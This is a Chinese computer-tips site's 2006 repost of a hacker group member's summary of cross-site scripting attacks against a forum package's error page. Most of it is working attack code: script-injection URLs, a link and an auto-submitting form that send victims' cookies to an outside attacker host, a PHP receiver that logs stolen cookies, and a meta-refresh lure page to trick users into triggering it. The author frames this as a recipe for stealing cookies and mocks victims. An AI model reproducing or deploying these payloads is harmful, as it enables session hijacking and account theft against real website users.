电脑常识文选 | QQ专区 | 硬件Diy | 电脑教程 | 电脑应用 | 网络应用 | Office | 操作系统 | 电脑学习 | 电脑知识库 | 网页制作 | 应用软件 | 电脑硬件
电脑故障 | 电脑网络 | 病毒防治 | 安全防护 | 电脑爱好者 | 电脑知识 | 软件应用 | 电脑医生 | cpu | 主板 | 硬盘 | 内存 | 显卡 | 显示器 | 键盘鼠标
本文相关内容
·一些Windows系统安全配置方法
·一些网络课堂用的龙腾播放器播放的文件如何下载? iAs
·一行代码崩溃IE
·一切尽在掌握-远程监控跟我学
·一连网就自动弹出一些不良网站,求助!
·展开杀毒大战之:剑指网页病毒
·展开杀毒大战之:力斩聊天病毒
·愿意当雷锋的进来
·远古视频直播你的网上视讯
·远程控制技术的应用
·远程控制工具PcAnywhere使用功略
·远程控制服务器的简捷方法
·远程控制篇:抓取远程屏幕图像
·远程控制篇:获得网络邻居所有机器名
·远程控制篇:服务端程序关机时的处理
·一上网就弹出来
·一鼠走天下:IE也玩鼠标手势
·一山还比一山高!破解“隐身”的几大绝招
·一首适合失恋的人听的歌曲
·一条ADSL实现多用户接入 共享上网
·一万个理由*.wav
·一台ADSL如何实现两台电脑共享上网?
·一台PC,两根网线,如何实现局域网、互联网转换
·一台XP,一台WIN2000的两台计算机如何共用一个ADSL号同时上网
·一台机器设置两个IP地址,清除IE的安全口令
·一同踏上wallop之旅
·一位高手整理的IIS FAQ
·一网络设置问题 请高手赐教
·一招在手想变就变:轻松切换IP地址
·一拍网上的Q币5角一个是真的吗?
  ★一些跨站脚本攻击的总结

一些跨站脚本攻击的总结

添加记录: 网络应用  类别: 网络应用  发布日期: 2006.09.20

文章作者:冰血封情[EST]
信息来源:EvilOctal Security Team(www.EvilOctal.com)

注意:这文章有局限性 但是毕竟是针对我个人的空间的情况而定义的 本来就是我个人的技术总结么 其他人生死冰血封情可就不管了 抱歉哦

以动网为例子通过简单构造弹出cookies的url来检测漏洞是否存在:

http://www.target.com/bbs/target.asp?Errcodes=<script>alert(document.cookie)</script>&action=otherErr

以上将弹出本地用户的cookies 下面重定向地址到邪恶八进制

http://www.target.com/bbs/target.asp?Errcodes=<script>document.location='[url]http://www.EvilOctal.com[/url]'</script>&action=otherErr

其实方法在这里 php如果过滤不严 也大同小异

http://www.target.com/bbs/target.php/"><script>alert(document.cookie)</script>

下面是经典用法 构造链接盗取cookies 这里以php空间为例子 谁让偶的是bsd+mysql+php空间呢:
仍以动网为例子 构造如下链接 别以为我说的是动网哦 相信聪明的你很容易明白的^_^

http://www.target.com/bbs/target.asp?Errcodes=<script>document.location='[url]http://www.SecurityPeak.com/cookie.asp?[/url]'%2B.</script>&action=otherErr

很遗憾 有的时候没那么好:(
第一 有可能受到主机安全限制无法执行以上的url 比如php中那个恶心的斜杠
第二 没有一个白痴会像流氓豆(嘿嘿 对Etern4lCn进行一下人身攻击)一样去点这么奇怪的一个地址链接

好!首先来如何解决一...突破php安全限制:

http://www.target.com/bbs/target.php/"><form name=EvilOctal method=post action=http://www.EvilOctal.com/cookie.php>
<input type=txt name=info><input type=submit value=EvilOctal></form>
<script>
document.EvilOctal.info.value=document.cookie;
document.EvilOctal.submit();
</script>

以下我们来看看cookie.php的内容 因为cookie在远程提交的时候 必需有负责接收的:

<?php
$info = getenv("QUERY_STRING");
if ($info) {
$info=urldecode($info);
$fp = fopen("info.txt","a");
fwirte($fp,$info."\n\n\n\n");
fclose($fp);
header("Location:[url]http://www.EvilOctal.com/news.htm[/url]");
}
?>

这样第一个问题就完美解决:)
现在我们来看看第二个 嘿嘿 其实上面一经解决了 只要大家看看美丽的news.htm的内容就知道了:

<meta http-equiv="refresh" content="1;url=http://www.target.com/bbs/target.asp?Errcodes=<script>document.location='[url]http://www.EvilOctal.com/cookie.php?[/url]'%2Bdocument.cookie</script>&action=otherErr>


现在明白了么?其实关键就在那个cookie.php 欺骗的关键 这样针对跨站脚本攻击中最敏感的部分冰血封情就总结完了 欢迎来到邪恶八进制 论坛地址自己找...
Have fun:)

(出处:http://www.8s8s.net)



上一篇:一些进程需要高手帮我看看 下一篇:一些自作多情的工具栏占据了我将近三分之一的桌面,如何才能删掉它?

电脑常识文选风云榜
声卡音箱 | 软驱光驱 | 打印机 | 机箱电源 | BIOS | 操作系统 | 局域网 | 浏览器 | 网卡 | 电脑死机

电脑常识文选 © 2006 版权所有

提示:本站致力于电脑使用常识,电脑故障排除,计算机使用小窍门的分享与传播,内容仅供参考,按此操作责任自负。